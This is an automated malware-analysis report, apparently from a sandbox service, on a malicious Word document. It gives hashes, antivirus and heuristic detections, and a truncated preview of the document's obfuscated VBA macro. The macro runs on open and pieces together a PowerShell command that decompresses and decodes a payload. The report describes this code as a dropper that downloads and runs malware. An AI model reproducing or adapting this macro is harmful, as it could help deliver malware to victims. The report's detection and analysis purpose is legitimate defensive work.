Office (OLE) malware analysis — malicious · 17f33263e614cd38

MALICIOUS

Office (OLE)

262.8 KB Created: 2018-07-10 22:29:00 Authoring application: Microsoft Office Word First seen: 2018-07-27

MD5: 82c17ddcaf54eb90ba08c1038f6a71e4 SHA-1: 1281e51cad9669a106327f977f0c5edb978afed6 SHA-256: 17f33263e614cd38db13138aa887998f2cc93189b5d3f176a56ecdb360700291

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro that is automatically executed upon opening the document. This macro constructs and executes a PowerShell command that downloads a payload from a hardcoded URL and executes it. The ClamAV heuristic also flags this as a dropper, indicating its role in delivering further malware.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6607195-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6607195-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19426 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	19426 bytes
SHA-256: `bcd0219c31bd0276e2a730b8a6daf32442cecf0c0bfe770a44ad897f213d6940`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "bkAzGRGn" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next YXsiT = 99982 - rNRSDC * lDPuj / NQoYK QIlMB = 40429 - rMbHmB * ijEAuK / XEdaKf Ilrpb = 70219 + HnHLPz * 14988 * jMpIwd * (ScRaa / wDCIkf * (37250 + Zstlv / 38294 - AWwfZ)) DoYuam = 36267 + YAKiK * 69164 * CfUoj * (TvXDJ / RFSvA * (30030 + AOkpE / 62862 - KTsaQ)) uQYGZPStN ("" + UTfpcibFQiVV + HIiOfhjYQdj + sACvL + RvWQvJEKo + QUvbOfJmF + USKlDfksBrQkAJ + JPDjqSq) fwzDw = 74248 + RVlzl * 29857 * cPWjw * (vzBNnR / GAFBc * (88404 + XjkpEE / 31530 - fYGTu)) End Sub Attribute VB_Name = "TUircLjzlPf" Function sACvL() On Error Resume Next cCIaQh = 31088 * VPRwkK + (24244 - AYHZt - PaZbH + 52700 + CXPcq - XGrdjT * 57598 + DPGCEw) SYOpZm = 65046 * oZoRS + (84734 - Vujpz - vaFPS + 22723 + SYDfC - FrNAE * 69994 + qoGiM) zHLPBr = "p" + kIXGYnWzJ + aWiPWJPL + "o" + IubFYSHU + AAzhQfY + "we" + itEZwJCHYj + GYBcNvBAVPdiYG + "rsh" + BzrklsERDU + VLikFFtbwFDjWc + "e" + QWBridGZs + OUkZsRGf + "ll" + scSMzcvwHOI + AjTmMrEJrVtf + " " + fKRQzomY + ijBKdlWDUjjs + "( N" + tnFWAHZhsQP + zKFwcmkHdqujG + "ew-" + KXcmlmXKjQXnI + lurvYsPkGGoYP + "OBj" + puHkXUnd + ZAViFzc + "e" + FzpKawvnWjwN + YacfYZWzR + "cT" + wstCAHMNcrKAj + bhQwDpRmzIcTD + " " + HiwRbECkV + zfWNZswkzpjU + "io" + hFvuXnI + jcBSFjZwu + ".S" pmQji = (VSmaaN + OuwGq) - 95972 * bWRmlY - sBYsmw + OuoMM qqmIO = (DLkSGw + rSUizJ) - 17448 * ROhoQs - zKtiJ + ljfdW OcGaNz = "TR" + RFmpJbvZJOCi + bFTwzDLZZc + "e" + GlpAbblvAI + GQEZAfbidMFZJY + "aM" + VrjKBpVJkI + ttYSKUrhwlY + "r" + IrujPrC + aIckzRvup + "Ea" + AljnmPphCVjSm + zbdVRkkbSPqZWZ + "de" + wjBzWHG + BVowrqpaETURUa + "r(" + KRYwqTHQR + kKXqUjVPOvib + " (" + zSFRmcG + LqhzJiOXiEFE + " N" + dzhwKsUjpzvr + wfJiqcL + "ew" + lMhzYzXTvjlcS + wBNfAiCShNY + "-O" + aOmVcMvmcswjSf + PYjafioO + "Bj" + EjtAmzActhwQzG + TIRziDCLRosYO + "ec" + XodHLsbGwj + SKzYZRoPjzhR + "T " + ijwHbOBHZbWw + rCUStQjASPSGac + "IO" + HMGiJsHpEbk + XBaVoXddOXkw + ".Co" ioVnY = (wTKsS + wufOSj) - 46362 * uNsll - PwtoV + bbYBjn ujcfzZESKdG = "mp" + ErhCzZjzzFEa + UwjCUzCZWX + "re" + XVifiUbdq + jmffwtiQ + "S" + FEEzkrzk + KPlBNTUajw + "sio" + wmAQoTDfoGi + RZjtcitMC + "N" + AdSfZHjGVY + wUCdjwjDj + ".dE" + vunjGUuUvmjP + XGjZbht + "FlA" + hYaAMNWv + tWllaZlbE + "Te" + SFrdJrziFAq + GHjUhGZrszRim + "str" + zqGoBaO + XDVXRiRCmzfS + "eam" + twkoZHazW + iOuChMrowzdkC + "([" + jOropnGZ + RmpMIXhwimTWA + "io." + niuTPNhOPbLI + EYpiMQaCcqZw + "ME" + nqJOmDBJLG + jXakwPzPZNi + "M" oLlCEu = aJbYR / VihvNi / jjDbrt * zWwZM / 41078 + zsPHGM * (56304 - ZvBTz - 88512 * iiAvC) QGINN = "OR" + JKLkVELB + XYmRnGWIhGHaYu + "ys" + nTZQTVpjFzv + zOuqWbVj + "T" + uYtXBAjmQUtQr + dCiCLqLvBksMkB + "re" + sWcirZzojWLiGN + SutZnhFAjd + "AM" + IozkwbBuOzDDE + pfjonDVup + "]" + GLQcvOhKfvWaf + lIUrpVtN + " [" + CoEjntKcFU + mBoWtNXTEBJ + "S" + MZwSXMzzG + cbsBLwZKXG + "yST" KKTqLZ = aEkMQL / cjcqPU / GEoHRj * XkBvIY / 70392 + oMiSN * (47978 - jVicD - 49720 * wwwSfD) CTcjq = RBfdQb / MKiIr / jHPtRV * HGbwD / 23159 + GvwujH * (4548 - suzKRi - 99225 * rCfbpL) nAXfp = "EM." + tqjCTiRInDGv + wGVAXSYp + "con" + bmCwpshPId + iWmwDaoATAh + "ve" + MKDiNJDJMbhfST + qnnbTczNZP + "r" + jDaEQzd + hvThTRvESkG + "T" + cNuKfjLpJzL + JAdOTqNsJsT + "]:" + KEIGirI + NJGTtWoXzIf + ":fR" + ubDQQimS + QfYHjCSTsbi + "OM" MccvR = WazcD / GzIqh / QTmUzR * UZwYB / 1492 + YcEqL * (75655 - LtcWu - 88336 * tHjYfz) IAzrD = uLNLCJ / CObiPI / ipoUPI * iomNa / 12163 + vQTni * (62830 - PCTWzz - 747 * rOMZw) DOKVpFjSIm = "b" + rfKlwpZCwbt + tRftMFaKwDX + "AS" + SNAWCiGwMLB + VTZZTAZPN + "E" + llZqVtbmDVXMC + OthjGistkG + "64S" + kXILEvHkRE + TjOwwzHWzul + "T" + hLOsspkkUrPu + QvpHKdGMW + "rI" wmzOZp = ciXjts / Pfqzr / DnfqbK * bCaVow / 97631 + CkWvCd * (34344 - vhBziu - 96012 * MiPqJ) MrskVqUEl = "Ng" + OBKZDBuutdNu + pWmHjIa + "(" + hEKIJ ... (truncated)

SHA-256: bcd0219c31bd0276e2a730b8a6daf32442cecf0c0bfe770a44ad897f213d6940

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "bkAzGRGn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   YXsiT = 99982 - rNRSDC * lDPuj / NQoYK
   QIlMB = 40429 - rMbHmB * ijEAuK / XEdaKf
   Ilrpb = 70219 + HnHLPz * 14988 * jMpIwd * (ScRaa / wDCIkf * (37250 + Zstlv / 38294 - AWwfZ))
   DoYuam = 36267 + YAKiK * 69164 * CfUoj * (TvXDJ / RFSvA * (30030 + AOkpE / 62862 - KTsaQ))
uQYGZPStN ("" + UTfpcibFQiVV + HIiOfhjYQdj + sACvL + RvWQvJEKo + QUvbOfJmF + USKlDfksBrQkAJ + JPDjqSq)
   fwzDw = 74248 + RVlzl * 29857 * cPWjw * (vzBNnR / GAFBc * (88404 + XjkpEE / 31530 - fYGTu))
End Sub


Attribute VB_Name = "TUircLjzlPf"
Function sACvL()
On Error Resume Next
cCIaQh = 31088 * VPRwkK + (24244 - AYHZt - PaZbH + 52700 + CXPcq - XGrdjT * 57598 + DPGCEw)
   SYOpZm = 65046 * oZoRS + (84734 - Vujpz - vaFPS + 22723 + SYDfC - FrNAE * 69994 + qoGiM)
zHLPBr = "p" + kIXGYnWzJ + aWiPWJPL + "o" + IubFYSHU + AAzhQfY + "we" + itEZwJCHYj + GYBcNvBAVPdiYG + "rsh" + BzrklsERDU + VLikFFtbwFDjWc + "e" + QWBridGZs + OUkZsRGf + "ll" + scSMzcvwHOI + AjTmMrEJrVtf + " " + fKRQzomY + ijBKdlWDUjjs + "( N" + tnFWAHZhsQP + zKFwcmkHdqujG + "ew-" + KXcmlmXKjQXnI + lurvYsPkGGoYP + "OBj" + puHkXUnd + ZAViFzc + "e" + FzpKawvnWjwN + YacfYZWzR + "cT" + wstCAHMNcrKAj + bhQwDpRmzIcTD + "  " + HiwRbECkV + zfWNZswkzpjU + "io" + hFvuXnI + jcBSFjZwu + ".S"
pmQji = (VSmaaN + OuwGq) - 95972 * bWRmlY - sBYsmw + OuoMM
   qqmIO = (DLkSGw + rSUizJ) - 17448 * ROhoQs - zKtiJ + ljfdW
OcGaNz = "TR" + RFmpJbvZJOCi + bFTwzDLZZc + "e" + GlpAbblvAI + GQEZAfbidMFZJY + "aM" + VrjKBpVJkI + ttYSKUrhwlY + "r" + IrujPrC + aIckzRvup + "Ea" + AljnmPphCVjSm + zbdVRkkbSPqZWZ + "de" + wjBzWHG + BVowrqpaETURUa + "r(" + KRYwqTHQR + kKXqUjVPOvib + " (" + zSFRmcG + LqhzJiOXiEFE + " N" + dzhwKsUjpzvr + wfJiqcL + "ew" + lMhzYzXTvjlcS + wBNfAiCShNY + "-O" + aOmVcMvmcswjSf + PYjafioO + "Bj" + EjtAmzActhwQzG + TIRziDCLRosYO + "ec" + XodHLsbGwj + SKzYZRoPjzhR + "T " + ijwHbOBHZbWw + rCUStQjASPSGac + "IO" + HMGiJsHpEbk + XBaVoXddOXkw + ".Co"
ioVnY = (wTKsS + wufOSj) - 46362 * uNsll - PwtoV + bbYBjn
ujcfzZESKdG = "mp" + ErhCzZjzzFEa + UwjCUzCZWX + "re" + XVifiUbdq + jmffwtiQ + "S" + FEEzkrzk + KPlBNTUajw + "sio" + wmAQoTDfoGi + RZjtcitMC + "N" + AdSfZHjGVY + wUCdjwjDj + ".dE" + vunjGUuUvmjP + XGjZbht + "FlA" + hYaAMNWv + tWllaZlbE + "Te" + SFrdJrziFAq + GHjUhGZrszRim + "str" + zqGoBaO + XDVXRiRCmzfS + "eam" + twkoZHazW + iOuChMrowzdkC + "([" + jOropnGZ + RmpMIXhwimTWA + "io." + niuTPNhOPbLI + EYpiMQaCcqZw + "ME" + nqJOmDBJLG + jXakwPzPZNi + "M"
oLlCEu = aJbYR / VihvNi / jjDbrt * zWwZM / 41078 + zsPHGM * (56304 - ZvBTz - 88512 * iiAvC)
QGINN = "OR" + JKLkVELB + XYmRnGWIhGHaYu + "ys" + nTZQTVpjFzv + zOuqWbVj + "T" + uYtXBAjmQUtQr + dCiCLqLvBksMkB + "re" + sWcirZzojWLiGN + SutZnhFAjd + "AM" + IozkwbBuOzDDE + pfjonDVup + "]" + GLQcvOhKfvWaf + lIUrpVtN + " [" + CoEjntKcFU + mBoWtNXTEBJ + "S" + MZwSXMzzG + cbsBLwZKXG + "yST"
KKTqLZ = aEkMQL / cjcqPU / GEoHRj * XkBvIY / 70392 + oMiSN * (47978 - jVicD - 49720 * wwwSfD)
   CTcjq = RBfdQb / MKiIr / jHPtRV * HGbwD / 23159 + GvwujH * (4548 - suzKRi - 99225 * rCfbpL)
nAXfp = "EM." + tqjCTiRInDGv + wGVAXSYp + "con" + bmCwpshPId + iWmwDaoATAh + "ve" + MKDiNJDJMbhfST + qnnbTczNZP + "r" + jDaEQzd + hvThTRvESkG + "T" + cNuKfjLpJzL + JAdOTqNsJsT + "]:" + KEIGirI + NJGTtWoXzIf + ":fR" + ubDQQimS + QfYHjCSTsbi + "OM"
MccvR = WazcD / GzIqh / QTmUzR * UZwYB / 1492 + YcEqL * (75655 - LtcWu - 88336 * tHjYfz)
   IAzrD = uLNLCJ / CObiPI / ipoUPI * iomNa / 12163 + vQTni * (62830 - PCTWzz - 747 * rOMZw)
DOKVpFjSIm = "b" + rfKlwpZCwbt + tRftMFaKwDX + "AS" + SNAWCiGwMLB + VTZZTAZPN + "E" + llZqVtbmDVXMC + OthjGistkG + "64S" + kXILEvHkRE + TjOwwzHWzul + "T" + hLOsspkkUrPu + QvpHKdGMW + "rI"
wmzOZp = ciXjts / Pfqzr / DnfqbK * bCaVow / 97631 + CkWvCd * (34344 - vhBziu - 96012 * MiPqJ)
MrskVqUEl = "Ng" + OBKZDBuutdNu + pWmHjIa + "(" + hEKIJ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.